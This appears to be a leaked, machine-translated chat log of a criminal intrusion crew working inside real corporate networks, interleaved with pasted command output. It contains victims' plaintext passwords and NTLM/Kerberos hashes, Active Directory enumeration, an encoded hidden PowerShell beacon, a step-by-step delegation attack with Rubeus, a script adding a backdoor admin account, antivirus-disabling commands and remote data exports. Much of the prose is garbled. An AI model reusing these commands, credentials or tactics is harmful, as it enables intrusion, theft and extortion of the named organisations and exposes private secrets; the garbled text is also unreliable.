while we're starting this one - you get the helpathome + i tuta i think everyone is here? @tl1 build please wait for build not see among ad_userfolder files wrong windef log cleaned up, and i also tried through PS but nothing worked from scriptov to arma?in koba does not draw?[ ](https://mediaeveryone.com/group/oasispetroleum-com?msg=WjC8jA9pp3cGTSPik) vtotpis here the last post what was done so far and what the problem forgot) aazaley files by the way yesterday AD did not pour here when picked up)) vindef and i think i already found there what edr product?while put in suspended I will give a new accessthat I'm at a standstill, I can not raise the rights, I tried all sorts of pull in the cobu that it would spin, no luck, and as for eleveit kita none of this does not work (I do not knowkakzakriptovat) then the session in slipnetut trusts are there?+ready after the launch, write back + now I'll give you the buildd if the fix then yes[ ](https://mediaeveryone.com/group/ballymoregroup-com?msg=YCqw2iCZWFzgipPg7) what are you talking about? find a place on the server fix it very well here?
$krb5tgs$23$*sqladmin$ballymoregroup.local ballymore2015
``stupidly-a.
they didn't give away any of the downloaded options.
i would throw here if there were kerbs unbrushed for a week? + flew in 20 minutes @user4 will be clean not especially if you do not count that flew in 30+ sessions left then clean who coba cleaner? 1let me load Friday's sessions disappearedthere's not much useful information about accesses. i've downloaded a six gig backup here. have you looked up and down the iMicrosoft mail here?the root/pass combination does not seem to occur at all, and in the mail it was said that the nimbles are associated with the active directory, tried the DA and the IT guys, tried their passwords with the root, with the admin, does not pass
the letter with information about connection to AD was a year ago, if memory serves me correctly, so it is likely that after the previous command they have changed something there if there are any nix machines with root passwords it is logical to check these same root passwords to nimbles and also checked the routers? on nimbles looked for web access? the current - those that were already in operation + EllevateKitnetta)lpe it - Local Privilege Escalation?
    CVE-2015-2546
    CVE-2016-3309
    CVE-2017-0101
    CVE-2018-8120
    CVE-2019-1458
    CVE-2020-0796
```
trying to figure out the exploits, I think they'll fitzlalilsexploit, fill up the rubus and remove the kerbscrewsscale me when you pick it up I'll delete it
https://wideio.com/UWaHAGCE3ysxyInTF4bOqTShHpypftKMWQKJ0ZcK/ad.7z
``secmplease let me give it to you ado delete all files, tell me how you'll do it, put file 6 and archive it``
cmd /c 7za a ad.7z ad_computers.txt ad_group.txt ad_ous.txt ad_subnets.txt ad_users.txt
you know, now? where is 6:not enough files if you wrap a bunch then there is just a comma separated list without any quotes ?ok i'll pour you 7 tell me how you did upload you adfindshe now upload you there is unlikely to let no LA You do not have systems noticed there is a folder domain admin in the folder usernet, i upload or deadick upload tool and then run in this tool ?
and how do I pour the addfynd ?
C:\temp
OAPVDI17 @ OASISPETR\bmolinaro
 net localgroup "Administrators"
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
oasis_admin
OASISPETR\Domain Admins
OASISPETR\ryoung
OASISPETR\SCOM 2012 Administrators
The command completed successfully.

 00:00.0140

C:\temp
OAPVDI17 @ OASISPETR\bmolinaro
 net group "Domain Admins" /dom
The request will be processed at a domain controller for domain Oasispetr.com.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator buadmin camador_admin
dpeterson_admin jdehuma_admin jedmond_admin
ptran_admin ryoung_admin
The command completed successfully.

 00:00.0273

C:\temp
OAPVDI17 @ OASISPETR\bmolinaro
 net group "Enterprise Admins" /dom
The request will be processed at a domain controller for domain Oasispetr.com.

Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
Administrator buadmin camador_admin
dpeterson_admin jdehuma_admin jedmond_admin
ptran_admin ryoung_admin
The command completed successfully.
``````
user7:QnQnUKIIGIlqeZzisFpexTu92easVI7lyY8
user7:9rczctBY0p4wbKRPIsXqb8hcLY29VhrzDjH - valid?
https://wideio.com/iZsHDvbmvbXLZ8tAeyrT7HbWkZS6Ll40TXCUfJL0
``````
user7:9rczctBY0p4wbKRPIsXqb8hcLY29VhrzDjH
``Okay congratulations, I'll give you a new tule, while you work from it and wait for feedback that you did not pick up?`` Did not come? 100% must be because I was thrown out? +x64? apparently not registered as edrf only vindef....``



displayName=Windows Defender







``I'm not asking for the shellcode of your koba, give me the x64 shellcode, then don't say anything.
 net localgroup "administrators"
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
oasis_admin
OASISPETR\Domain Admins
OASISPETR\ryoung
OASISPETR\SCOM 2012 Administrators
The command completed successfully.
If your session is up, maybe I should just change the cobo?
Image Name PID Session Name Session# Mem Usage Status User Name CPU Time Window Title
========================= ======== ================ =========== ============ =============== ================================================== ============ ========================================================================
System Idle Process 0 Services 0 8 K Unknown NT AUTHORITY\SYSTEM 550:46:16 N/A
System 4 Services 0 144 K Unknown N/A 0:12:08 N/A
Registry 104 Services 0 99,096 K Unknown N/A 0:00:14 N/A
smss.exe 1108 Services 0 1,200 K Unknown N/A 0:00:00 N/A
csrss.exe 1216 Services 0 5,556 K Unknown N/A 0:00:17 N/A
wininit.exe 1324 Services 0 6,900 K Unknown N/A 0:00:00 N/A
services.exe 1448 Services 0 14,680 K Unknown N/A 1:25:07 N/A
lsass.exe 1464 Services 0 25,368 K Unknown N/A 0:02:36 N/A
svchost.exe 1616 Services 0 6,480 K Unknown N/A 0:00:01 N/A
svchost.exe 1664 Services 0 60,468 K Unknown N/A 0:01:21 N/A
fontdrvhost.exe 1704 Services 0 4,404 K Unknown N/A 0:00:00 N/A
svchost.exe 1844 Services 0 21,452 K Unknown N/A 0:05:14 N/A
svchost.exe 1888 Services 0 351,868 K Unknown N/A 0:00:12 N/A
svchost.exe 2040 Services 0 17,592 K Unknown N/A 0:00:08 N/A
svchost.exe 1152 Services 0 8,808 K Unknown N/A 0:00:02 N/A
svchost.exe 1144 Services 0 9,424 K Unknown N/A 0:00:01 N/A
svchost.exe 1180 Services 0 10,608 K Unknown N/A 0:00:04 N/A
svchost.exe 1444 Services 0 11,976 K Unknown N/A 0:00:01 N/A
svchost.exe 1948 Services 0 9,440 K Unknown N/A 0:00:14 N/A
svchost.exe 2008 Services 0 15,284 K Unknown N/A 0:00:02 N/A
svchost.exe 2060 Services 0 10,680 K Unknown N/A 0:00:22 N/A
svchost.exe 2196 Services 0 29,084 K Unknown N/A 0:07:19 N/A
svchost.exe 2292 Services 0 15,996 K Unknown N/A 0:00:02 N/A
svchost.exe 2300 Services 0 10,900 K Unknown N/A 0:00:04 N/A
svchost.exe 2308 Services 0 53,020 K Unknown N/A 0:01:47 N/A
svchost.exe 2324 Services 0 11,272 K Unknown N/A 0:00:23 N/A
svchost.exe 2332 Services 0 116,176 K Unknown N/A 0:41:49 N/A
svchost.exe 2340 Services 0 7,492 K Unknown N/A 0:00:02 N/A
Memory Compression 2460 Services 0 6,720 K Unknown N/A 0:00:41 N/A
svchost.exe 2532 Services 0 10,220 K Unknown N/A 0:00:01 N/A
svchost.exe 2588 Services 0 9,528 K Unknown N/A 0:00:01 N/A
svchost.exe 2596 Services 0 9,700 K Unknown N/A 0:00:01 N/A
svchost.exe 2604 Services 0 18,032 K Unknown N/A 0:00:18 N/A
svchost.exe 2856 Services 0 15,416 K Unknown N/A 0:00:04 N/A
svchost.exe 2932 Services 0 12,280 K Unknown N/A 0:00:03 N/A
svchost.exe 3016 Services 0 7,888 K Unknown N/A 0:00:04 N/A
svchost.exe 3028 Services 0 11,456 K Unknown N/A 0:00:04 N/A
svchost.exe 2172 Services 0 9,596 K Unknown N/A 0:00:04 N/A
svchost.exe 2272 Services 0 9,660 K Unknown N/A 0:00:01 N/A
svchost.exe 2564 Services 0 9,272 K Unknown N/A 0:00:10 N/A
svchost.exe 2688 Services 0 10,828 K Unknown N/A 0:00:48 N/A
svchost.exe 2764 Services 0 14,144 K Unknown N/A 0:00:01 N/A
svchost.exe 3132 Services 0 55,284 K Unknown N/A 0:23:09 N/A
svchost.exe 3236 Services 0 19,864 K Unknown N/A 0:00:01 N/A
svchost.exe 3256 Services 0 15,324 K Unknown N/A 0:00:05 N/A
svchost.exe 3268 Services 0 11,504 K Unknown N/A 0:00:38 N/A
spoolsv.exe 3348 Services 0 31,140 K Unknown N/A 0:00:17 N/A
svchost.exe 3524 Services 0 13,912 K Unknown N/A 0:00:02 N/A
svchost.exe 3552 Services 0 9,112 K Unknown N/A 0:00:02 N/A
BrokerAgent.exe 3680 Services 0 115,084 K Unknown N/A 0:00:47 N/A
CdfSvc.exe 3688 Services 0 9,020 K Unknown N/A 0:00:01 N/A
encsvc.exe 3708 Services 0 8,136 K Unknown N/A 0:15:44 N/A
CseEngine.exe 3768 Services 0 31,752 K Unknown N/A 0:00:47 N/A
PicaSvc2.exe 3816 Services 0 59,540 K Unknown N/A 0:00:11 N/A
UWACacheService.exe 3828 Services 0 48,584 K Unknown N/A 0:00:08 N/A
CtxCeipSvc.exe 3844 Services 0 9,424 K Unknown N/A 0:00:29 N/A
CmRcService.exe 3868 Services 0 14,192 K Unknown N/A 0:00:00 N/A
svchost.exe 3888 Services 0 7,848 K Unknown N/A 0:00:01 N/A
svchost.exe 3960 Services 0 16,604 K Unknown N/A 0:00:33 N/A
CtxAudioService.exe 3980 Services 0 13,680 K Unknown N/A 0:00:01 N/A
CtxSvcHost.exe 4012 Services 0 10,360 K Unknown N/A 0:00:00 N/A
WebSocketService.exe 4052 Services 0 11,284 K Unknown N/A 0:00:00 N/A
CtxSvcHost.exe 4092 Services 0 9,500 K Unknown N/A 0:00:01 N/A
CtxSvcHost.exe 3228 Services 0 9,556 K Unknown N/A 0:00:01 N/A
CtxSvcHost.exe 3444 Services 0 126,708 K Unknown N/A 0:00:03 N/A
svchost.exe 3608 Services 0 46,272 K Unknown N/A 0:01:00 N/A
svchost.exe 4116 Services 0 46,932 K Unknown N/A 0:02:39 N/A
CtxSvcHost.exe 4264 Services 0 9,540 K Unknown N/A 0:00:02 N/A
svchost.exe 4288 Services 0 7,236 K Unknown N/A 0:00:01 N/A
VGAuthService.exe 4304 Services 0 12,024 K Unknown N/A 0:00:04 N/A
vmtoolsd.exe 4312 Services 0 24,408 K Unknown N/A 0:04:45 N/A
MsMpEng.exe 4340 Services 0 235,604 K Unknown N/A 0:35:37 N/A
svchost.exe 4348 Services 0 22,264 K Unknown N/A 0:00:02 N/A
CtxSvcHost.exe 4632 Services 0 9,520 K Unknown N/A 0:00:01 N/A
CtxSvcHost.exe 4640 Services 0 9,704 K Unknown N/A 0:00:01 N/A
svchost.exe 4744 Services 0 11,780 K Unknown N/A 0:00:38 N/A
svchost.exe 4760 Services 0 9,248 K Unknown N/A 0:00:02 N/A
svchost.exe 4784 Services 0 7,152 K Unknown N/A 0:00:02 N/A
svchost.exe 4820 Services 0 10,500 K Unknown N/A 0:00:02 N/A
dllhost.exe 5292 Services 0 16,212 K Unknown N/A 0:00:13 N/A
svchost.exe 5416 Services 0 11,572 K Unknown N/A 0:00:01 N/A
WmiPrvSE.exe 5440 Services 0 39,052 K Unknown N/A 0:41:08 N/A
WmiPrvSE.exe 5692 Services 0 52,708 K Unknown N/A 0:09:35 N/A
msdtc.exe 5780 Services 0 13,344 K Unknown N/A 0:00:02 N/A
svchost.exe 6364 Services 0 22,544 K Unknown N/A 0:05:27 N/A
svchost.exe 6668 Services 0 9,036 K Unknown N/A 0:00:01 N/A
CtxSvcHost.exe 6992 Services 0 8,308 K Unknown N/A 0:00:02 N/A
SemsService.exe 7000 Services 0 35,776 K Unknown N/A 0:00:06 N/A
ctxrdr.exe 7012 Services 0 8,684 K Unknown N/A 0:00:02 N/A
CpSvc64.exe 7024 Services 0 15,924 K Unknown N/A 0:00:04 N/A
svchost.exe 7192 Services 0 9,216 K Unknown N/A 0:00:38 N/A
svchost.exe 7268 Services 0 6,908 K Unknown N/A 0:00:01 N/A
SearchIndexer.exe 7488 Services 0 50,656 K Unknown N/A 1:03:01 N/A
WmiPrvSE.exe 8056 Services 0 14,196 K Unknown N/A 0:01:05 N/A
svchost.exe 4672 Services 0 11,364 K Unknown N/A 0:00:02 N/A
svchost.exe 2956 Services 0 28,712 K Unknown N/A 0:02:14 N/A
svchost.exe 7548 Services 0 13,604 K Unknown N/A 0:03:46 N/A
CcmExec.exe 3336 Services 0 69,960 K Unknown N/A 0:01:50 N/A
svchost.exe 2520 Services 0 18,964 K Unknown N/A 0:00:01 N/A
WmiPrvSE.exe 2220 Services 0 18,432 K Unknown N/A 0:00:11 N/A
TelemetryService.exe 7560 Services 0 81,596 K Unknown N/A 0:00:21 N/A
AotListener.exe 2072 Services 0 36,720 K Unknown N/A 0:00:01 N/A
conhost.exe 4136 Services 0 12,768 K Unknown N/A 0:00:00 N/A
SgrmBroker.exe 5404 Services 0 6,160 K Unknown N/A 0:00:05 N/A
WmiPrvSE.exe 6688 Services 0 10,540 K Unknown N/A 0:00:00 N/A
WmiPrvSE.exe 8532 Services 0 53,972 K Unknown N/A 0:00:06 N/A
svchost.exe 8916 Services 0 17,940 K Unknown N/A 0:00:03 N/A
svchost.exe 8972 Services 0 10,060 K Unknown N/A 0:00:03 N/A
svchost.exe 3384 Services 0 33,832 K Unknown N/A 0:00:13 N/A
svchost.exe 6032 Services 0 21,468 K Unknown N/A 0:00:02 N/A
SecurityHealthService.exe 2896 Services 0 18,372 K Unknown N/A 0:00:03 N/A
svchost.exe 2088 Services 0 11,516 K Unknown N/A 0:00:02 N/A
NisSrv.exe 8760 Services 0 10,852 K Unknown N/A 0:00:04 N/A
svchost.exe 3084 Services 0 17,980 K Unknown N/A 0:00:04 N/A
svchost.exe 5652 Services 0 9,660 K Unknown N/A 0:00:00 N/A
svchost.exe 9604 Services 0 10,792 K Unknown N/A 0:00:01 N/A
svchost.exe 14016 Services 0 12,708 K Unknown N/A 0:00:00 N/A
csrss.exe 6224 Console 3 5,244 K Running N/A 0:00:05 N/A
winlogon.exe 6912 Console 3 13,436 K Unknown N/A 0:00:00 N/A
PicaSessionAgent.exe 10960 Console 3 11,608 K Running N/A 0:00:00 PicaSessionAgent
dwm.exe 10160 Console 3 90,200 K Running N/A 0:00:25 DWM Notification Window
fontdrvhost.exe 13920 Console 3 8,156 K Unknown N/A 0:00:00 N/A
PicaEuemRelay.exe 13704 Console 3 11,208 K Running N/A 0:00:00 PicaEuemRelay
GfxMgr.exe 13264 Console 3 11,368 K Running N/A 0:00:00 GfxMgrNotificationWindow
PicaTwiHost.exe 6252 Console 3 10,016 K Unknown N/A 0:00:00 N/A
CtxGfx.exe 13904 Console 3 56,964 K Running N/A 0:00:06 CtxGfxNotificationWindow
rundll32.exe 12096 Console 3 11,260 K Running N/A 0:00:00 N/A
ssonsvr.exe 1368 Console 3 10,916 K Running N/A 0:00:00 N/A
PicaUserAgent.exe 12500 Console 3 9,496 K Running OASISPETR\bmolinaro 0:00:00 PicaUserAgent
sihost.exe 3616 Console 3 27,124 K Running OASISPETR\bmolinaro 0:00:05 N/A
svchost.exe 13008 Console 3 20,796 K Unknown OASISPETR\bmolinaro 0:00:01 N/A
svchost.exe 7364 Console 3 32,160 K Running OASISPETR\bmolinaro 0:00:00 Windows Push Notifications Platform
taskhostw.exe 8800 Console 3 17,768 K Running OASISPETR\bmolinaro 0:00:00 Task Host Window
explorer.exe 812 Console 3 163,952 K Running OASISPETR\bmolinaro 0:01:06 N/A
svchost.exe 12316 Console 3 23,920 K Running OASISPETR\bmolinaro 0:00:00 N/A
WmiPrvSE.exe 11848 Services 0 16,516 K Unknown N/A 0:00:00 N/A
PicaShell.exe 11696 Console 3 26,748 K Running OASISPETR\bmolinaro 0:00:01 N/A
CtxMtHost.exe 13152 Console 3 11,928 K Running OASISPETR\bmolinaro 0:00:00 CtxTouchWTSWindow
mmvdhost.exe 13348 Console 3 13,996 K Running OASISPETR\bmolinaro 0:00:00 ICA Seamless Host Agent
StartMenuExperienceHost.e 9280 Console 3 66,000 K Running OASISPETR\bmolinaro 0:00:02 Start
WindowsInternal.Composabl 2472 Console 3 40,088 K Running OASISPETR\bmolinaro 0:00:00 Microsoft Text Input Application
RuntimeBroker.exe 12640 Console 3 26,744 K Unknown OASISPETR\bmolinaro 0:00:03 N/A
SearchUI.exe 2756 Console 3 196,552 K Running OASISPETR\bmolinaro 0:00:14 N/A
RuntimeBroker.exe 13468 Console 3 38,308 K Running OASISPETR\bmolinaro 0:00:02 N/A
YourPhone.exe 11552 Console 3 272 K Running OASISPETR\bmolinaro 0:00:00 N/A
ctfmon.exe 14180 Console 3 16,504 K Running OASISPETR\bmolinaro 0:00:03 N/A
RuntimeBroker.exe 1956 Console 3 13,824 K Unknown OASISPETR\bmolinaro 0:00:00 N/A
svchost.exe 10856 Console 3 21,984 K Unknown OASISPETR\bmolinaro 0:00:00 N/A
SCNotification.exe 9780 Console 3 39,064 K Running OASISPETR\bmolinaro 0:00:00 .NET-BroadcastEventWindow.4.0.0.0.1ca0192.0
SecurityHealthSystray.exe 11524 Console 3 13,416 K Running OASISPETR\bmolinaro 0:00:00 N/A
vmtoolsd.exe 11924 Console 3 18,028 K Running OASISPETR\bmolinaro 0:00:00 N/A
OneDrive.exe 11900 Console 3 69,616 K Running OASISPETR\bmolinaro 0:00:01 N/A
concentr.exe 6420 Console 3 22,880 K Running OASISPETR\bmolinaro 0:00:00 N/A Citrix Connection Center
Receiver.exe 11284 Console 3 23,464 K Running OASISPETR\bmolinaro 0:00:06 Citrix Receiver Notification
SelfServicePlugin.exe 8156 Console 3 29,836 K Running OASISPETR\bmolinaro 0:00:00 G
wfcrun32.exe 13200 Console 3 18,692 K Running OASISPETR\bmolinaro 0:00:00 RedirectWindow_Wind:3390:WFCRUN32.EXE
ApplicationFrameHost.exe 6900 Console 3 29,588 K Running OASISPETR\bmolinaro 0:00:00 Microsoft Store
WinStore.App.exe 6884 Console 3 52 K Running OASISPETR\bmolinaro 0:00:00 Microsoft Store
RuntimeBroker.exe 11240 Console 3 9,936 K Unknown OASISPETR\bmolinaro 0:00:00 N/A
dllhost.exe 6124 Console 3 12,432 K Running OASISPETR\bmolinaro 0:00:00 OleMainThreadWndName
RuntimeBroker.exe 12752 Console 3 18,520 K Unknown OASISPETR\bmolinaro 0:00:00 N/A
powershell.exe 12576 Console 3 88,356 K Running OASISPETR\bmolinaro 0:00:01 Windows PowerShell
conhost.exe 896 Console 3 21,876 K Running OASISPETR\bmolinaro 0:00:01 N/A
WmiPrvSE.exe 13540 Services 0 39,316 K Unknown N/A 0:00:01 N/A
cmd.exe 12088 Console 3 7,736 K Running OASISPETR\bmolinaro 0:00:00 Command Prompt - powershell.exe -nop -w hidden -ep bypass -e SQBFAFgAIA
conhost.exe 504 Console 3 22,900 K Running OASISPETR\bmolinaro 0:00:02 N/A
mstsc.exe 736 Console 3 30,544 K Running OASISPETR\bmolinaro 0:00:00 Remote Desktop Connection
ShellExperienceHost.exe 12760 Console 3 49,140 K Running OASISPETR\bmolinaro 0:00:00 Jump List for File Explorer
RuntimeBroker.exe 8688 Console 3 20,776 K Running OASISPETR\bmolinaro 0:00:00 OleMainThreadWndName
mstsc.exe 6064 Console 3 27,724 K Running OASISPETR\bmolinaro 0:00:01 Remote Desktop Connection
taskhostw.exe 13376 Services 0 17,012 K Unknown N/A 0:00:00 N/A
svchost.exe 12452 Services 0 82,648 K Unknown N/A 0:03:08 N/A
sppsvc.exe 7804 Services 0 11,756 K Unknown N/A 0:00:11 N/A
svchost.exe 10372 Services 0 22,744 K Unknown N/A 0:02:01 N/A
svchost.exe 11076 Services 0 7,560 K Unknown N/A 0:00:00 N/A
mstsc.exe 12112 Console 3 27,836 K Running OASISPETR\bmolinaro 0:00:00 Remote Desktop Connection
mstsc.exe 6340 Console 3 27,528 K Running OASISPETR\bmolinaro 0:00:00 Remote Desktop Connection
powershell.exe 8820 Console 3 78,588 K Running OASISPETR\bmolinaro 0:00:01 OleMainThreadWndName
MpCmdRun.exe 11944 Services 0 13,808 K Unknown N/A 0:00:00 N/A
svchost.exe 8492 Services 0 11,052 K Unknown N/A 0:00:00 N/A
smartscreen.exe 3808 Console 3 24,536 K Running OASISPETR\bmolinaro 0:00:00 OleMainThreadWndName
cmd.exe 6768 Console 3 7,460 K Running OASISPETR\bmolinaro 0:00:00 Command Prompt
conhost.exe 5504 Console 3 22,348 K Running OASISPETR\bmolinaro 0:00:00 N/A
tasklist.exe 6508 Console 3 11,592 K Unknown OASISPETR\bmolinaro 0:00:00 N/A
``````
At line:1 char:1

+ <#

+ ~~
This script contains malicious content and has been blocked by your antivirus software.
``I think it's blocking the connect@tl1 lvm biller dlllok try it, it fudne understand that ?versionlvm try it worse if you try the old cryptor ?removeagajdin what ? waiting now rebooting32 is 64 bit dll ? give dll to work ?i seea put this command plizmozhetd to tsmd is there still? rdp, vntz and so on start somerp, powershell, cmd, execute and so on what do you mean? verify what analogues run? any suggestions how to raise the session ?I will google it, don't forget about the account please) there is a principle of communication target machine + cobas for cobas on the git many of themc2 profiles of course let me give you a vector to read about c2 profiles just yet too broad topic on the detects for the current dialogueI mean, if the shell download from another url and it will then knock in the coba?and if it's quitting, is it quitting only the URL when the shell is downloaded or all the URLs? and also, how can you tell if the averter is quitting the URL? well, do us ack if you can. even good in general not bad, try to work with this dll (shelter only 32 can (because they themselves should be less scarey to build x64 and yet the 22 avers are silentWebroot SecureAnywhere
	Dynamic detect1 detekt na neplohokdoekdo 10 min verifyStrongNameKeyGenenen what input point? oh yeah) ah, something new decided to try x32 - is shelterPro uzayu x64? based on what you build? let me throw you - check? yeah dunno. not pull - I want to check. urgent need? and how? for office you better have a separate account can you give access to a service that is like a virrostotal? Check the dllk two of the whines (per hell) on the list have this port?
CORPKIOINTSQLP.CORP.TELEVISA.COM.MX
10.7.6.186:2717
``from a scan point may be closed, in one MSSQLSvc/CORPKIOBDD101.corp.televisa.com.mx:2717
in the others no + this port is closed port in spn? from hell
```
CORPKIOSQLVS02.CORP.TELEVISA.COM.MX
CORPKIOINTSQLP.CORP.TELEVISA.COM.MX
CORPKIOCRMSQLD.CORP.TELEVISA.COM.MX
CORPSFEDSQLD.CORP.TELEVISA.COM.MX
CORPSFEDSQLP.CORP.TELEVISA.COM.MX
ADMIN_SQL@FILIAL.TELEVISA.COM.MX
CORPKIOSHPSQLP.CORP.TELEVISA.COM.MX
CORPKIONCSQL02.CORP.TELEVISA.COM.MX
CORPKIONCSQL01.CORP.TELEVISA.COM.MX
CORPKIONCSQL03.CORP.TELEVISA.COM.MX
``Is there any way we can still find out what port the skull is running on if ladon and msf don't give anything on the skull?
they have custom ports on the skull
on one server it's on port 50101 and the other servers are closed `CORP\ctxdbadmin 7106c947d3a8abbea16cb5448f4ac00a` they have `Administrator` on some machines and `Administrador` on others, most likely yes
in the main domain almost everything is in English)may be they have international dialectic only need to learn) kek100% YES is to go to work in this company admin))it all gives a chancedano check skulia even in one half may be one LA, the second other LA yes, it is worth a try
but the chances are, of course, 50\50 because there are few overlapping LAs, conventionally in one group of servers one LA and eventually expand the network will be found We can check the rest of the pool of servers with this group LA can be hashdump polzak from this group may have local admins from the group that you have not seen before)``
CORPKIOBDD101\sqladmin:::2d593a1a330c2649716df558a5912ceb:::
``no, but does that do us any good?
there are a couple of whines where there is access, but the admins are sitting right on a limited number of cars, including dk and whines among them no you skul servaks brute force? or check the anonymous entrance? but from the classics ``you abuzilal genericall right?
didn't you abusive genericall rights?
```
Full control of a computer object can be used to perform a resource based constrained delegation attack.

Abusing this primitive is currently only possible through the Rubeus project.

First, if an attacker does not control an account with an SPN set, Kevin Robertson's Powermad project can be used to add a new attacker-controlled computer account:

New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)

PowerView can be used to then retrieve the security identifier (SID) of the newly created computer account:

$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid

We now need to build a generic ACE with the attacker-added computer SID as the pricipal, and get the binary bytes for the new DACL/ACE:

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

Next, we need to set this newly created security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the comptuer account we're taking over, again using PowerView in this case:

Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

We can then use Rubeus to hash the plaintext password into its RC4_HMAC form:

Rubeus.exe hash /password:Summer2018!

And finally we can use Rubeus' *s4u* module to get a service ticket for the service name (sname) we want to "pretend" to be "admin" for. This ticket is injected (thanks to /ptt), and in this case grants us access to the file system of the TARGETCOMPUTER:

Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB68393941032008AD47F /impersonateuser:admin /msdsspn:cifs/TARGETCOMPUTER.testlab.local /ptt
```
there is a user who has these permissions on the dk, or rather even a whole group, only I don't really understand how it works.
We add a machine account, sort of replace the original? That is, we reset the password from the machine account, and since it is dk, the network will fall.

Pinging filialeadc01.filial.televisa.com.mx [10.30.17.24] with 32 bytes of data:
Reply from 10.30.17.24: bytes=32 time=67ms TTL=122

Ping statistics for 10.30.17.24:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 67ms, Maximum = 67ms, Average = 67ms

beacon> portscan 10.30.17.24 445 none
[*] Tasked beacon to scan ports 445 on 10.30.17.24
[+] host called home, sent: 93285 bytes
[+] received output:
10.30.17.24:445
``+CORPKLHLQRD01 - pass``demosave.com``FILIAL\Ivargasv 2d0a7cb1ea602f59dc9c7ee5bd11597b` valid`FILIAL\jcgarciae TVSAcrm8888!Valid with user1poka all are busy, reserve for us) appeared fresh in the work grid, if anyone idle - beep in pm please where you pass + + others who are without tasks now - write, do not keep silent, on you chetu on then
i got it right - two interfaces on the touchceno also from chetu by the looks of on chetu just there, i move sideways and then the session came but the ip is different now run if you do not have session thrown me chetu? hello there. everything. sait i got it back khanypot it's definitely averm i think it's aB`threattest.edgewave.com i don't have a live one yet, who has sessions left elsewhere ?on regbest.com should be coming soon session from chetu.com - tell me how it will arrive in .binverno-10 minutes
now will be ready paiload - i will make all hello, we need dllk segonday for bouncing, right?
```
172.31.190.102:445 (platform: 500 version: 5.0 name: NDHSNASC9014 domain: JDOSSN)

[+] received output:
172.31.190.10:445 (platform: 500 version: 10.0 name: JDODC64 domain: JDOSSN)

[+] received output:
172.31.190.12:445 (platform: 500 version: 10.0 name: JDODC65 domain: JDOSSN)

[+] received output:
172.31.190.17:445 (platform: 500 version: 10.0 name: JDODHCP02 domain: JDOSSN)

[+] received output:
172.31.190.47:445 (platform: 500 version: 10.0 name: JDODC67 domain: JDOSSN)

[+] received output:
172.31.190.62:445 (platform: 500 version: 6.3 name: JDOCHOPS12 domain: JDOSSN)

[+] received output:
172.31.190.66:445 (platform: 500 version: 6.3 name: JDOCHSVC12 domain: JDOSSN)

[+] received output:
172.31.190.100:445 (platform: 500 version: 5.0 name: NDHSNASC9102 domain: JDOSSN)

[+] received output:
172.31.190.101:445 (platform: 500 version: 5.0 name: NDHSNASC9103 domain: JDOSSN)

[+] received output:
172.31.190.103:445 (platform: 500 version: 5.0 name: NDHSNASTESTC001 domain: JDOSSN)
Scanner module is complete
The kerb would be very helpful ... looking for a grid really big, oushek trash.on this, apparently, and no addinskih kreds.``
@ECHO OFF
net user LEADMIN Deere0419! /add
net localgroup Administrators LEADMIN /add
WMIC USERACCOUNT WHERE Name='LEADMIN' SET PasswordExpires=FALSE
``He found a script, I think with his help, they administered polzakowest little admin, apparently a local net division I checked - active or the account off or a real blank password if it does not contradict the policies of the addpost because it can not access the real hashdump question: how can it happen that hashdump shows a blank password for the dude who has the account is active?the neighbors have come back hogeys no voodoo it's not generalsessions and stuff clean up files as you can optionally set ignores and scans off of course there's no offsets there Using command linehttps://www.bitdefender.co.th/wp-content/uploads/gz/Bitdefender_EndpointSecurityToolsForWindows_UsersGuide_enUS.pdfhttps://www.wilderssecurity.com/threads/bitdefender-free-edition-service-start-stop-script.245247/
```
net start XCOMM
sc config XCOMM start= auto

net start bdss
sc config bdss start= auto

net start VSSERV
sc config VSSERV start= auto

net start LIVESRV
sc config LIVESRV start= auto

"C:\Program Files\Softwin\BitDefender10\bdmcon.exe"

net stop LIVESRV
sc config LIVESRV start= demand

net stop VSSERV
sc config VSSERV start= demand

net stop bdss
sc config bdss start= demand

net stop XCOMM
sc config XCOMM start= demand

``Send it to the forum and let it sit there.
https://codeby.net/threads/antivirusy-v-nokaut.60706/моих no there are no files in the system32 no old ones, surely they are not in the system32 not mine, and I have not left anywhere else) and also? allzona in the folder zabix, and the rest in the system32 dns where were they?) yes old files removed? already clean up the codeyda files all? thanks excellent + I say files do not forget to clean up after themselves you by the way at this rate in the system will shit all over the wild no it is ok ``
User7[GEORDI]Administrator */4692|2020Dec07 19:46:30> shell wmic /node:DATA3 process call create "cmd /c cd C:\zabbix_agent for /f %a in (C:\zabbix_agent\AllZones.txt) do dnscmd.exe /ZoneExport %a %a.txt"
[*] Tasked beacon to run: wmic /node:DATA3 process call create "cmd /c cd C:\zabbix_agent for /f %a in (C:\zabbix_agent\AllZones.txt) do dnscmd.exe /ZoneExport %a %a.txt"
[+] host called home, sent: 175 bytes
[+] received output:
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 7116;
	ReturnValue = 0;
};
```
but there's a problem with the second command, it doesn't output the dnsyd file) `` ``
User7[GEORDI]Administrator */4692|2020Dec07 19:38:31> shell wmic /node:DATA3 process call create "cmd /c dnscmd.exe /enumzones > C:\zabbix_agent\AllZones.txt"
[*] Tasked beacon to run: wmic /node:DATA3 process call create "cmd /c dnscmd.exe /enumzones > C:\zabbix_agent\AllZones.txt"
[+] host called home, sent: 129 bytes
[+] received output:
Executing (Win32_Process)->Create()

Method execution successful.

